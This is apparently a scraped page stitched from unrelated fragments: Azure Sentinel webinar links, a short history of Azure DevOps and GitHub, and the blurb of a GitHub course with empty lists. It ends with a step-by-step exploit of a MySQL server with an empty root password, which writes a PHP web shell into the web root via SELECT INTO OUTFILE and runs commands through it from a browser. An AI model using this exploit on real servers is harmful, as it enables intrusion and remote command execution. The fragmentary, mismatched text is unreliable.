Azure Sentinel webinar: Cloud & On-Premises architecture [ 89 min ]
Links:
- https://www.youtube.com/watch?v=_mm3GNwPBHU
Azure Sentinel webinar: Cloud & On-Premises architecture [ 89 min ]
Links:
Microsoft Azure Sentinel webinar: Post-Ignite. Understanding Azure Sentinel features and functionality deep dive. [ 88 min ]
Links:
Once upon a time, there was a Microsoft product called Team Foundation Server (TFS). The online version of TFS then became Visual Studio Online, which became Visual Studio Team Services, which is now Azure DevOps.
Microsoft bought Github in 2018, which is also a DevOps tool and shares a lot of the same features.
For the full details, read them at A Cloud Guru.
If you are looking for a quick and fun introduction to GitHub, you've found it. This class will get you started using GitHub in less than an hour.
None. This course is a great introduction for your first day on GitHub.
We'll answer common questions like:
And when you're done you'll be able to:
This is a simple and effective exploitation at a mis-configured MySQL/PHP server.
First, use nmap to discover a mis-configured MySQL where root with empty password.
Secondly, connect to the MySQL with mysql client.
$ mysql -u root -h 192.168.1.33
Then create a PHP backdoor with the following SQL command:
MySQL > select 'Hello World' into outfile '/tmp/test' from mysql.user limit 1;
MySQL > select '<?php $output=shell_exec($_GET["cmd"]);echo "<pre>".$output."</pre>"?>' into outfile '/var/www/html/shell.php' from mysql.user limit 1;
Lastly, start exploiting it from the browser:
http://192.168.1.33/shell.php
http://192.168.1.33/shell.php?cmd=id
http://192.168.1.33/shell.php?cmd=ps -eaf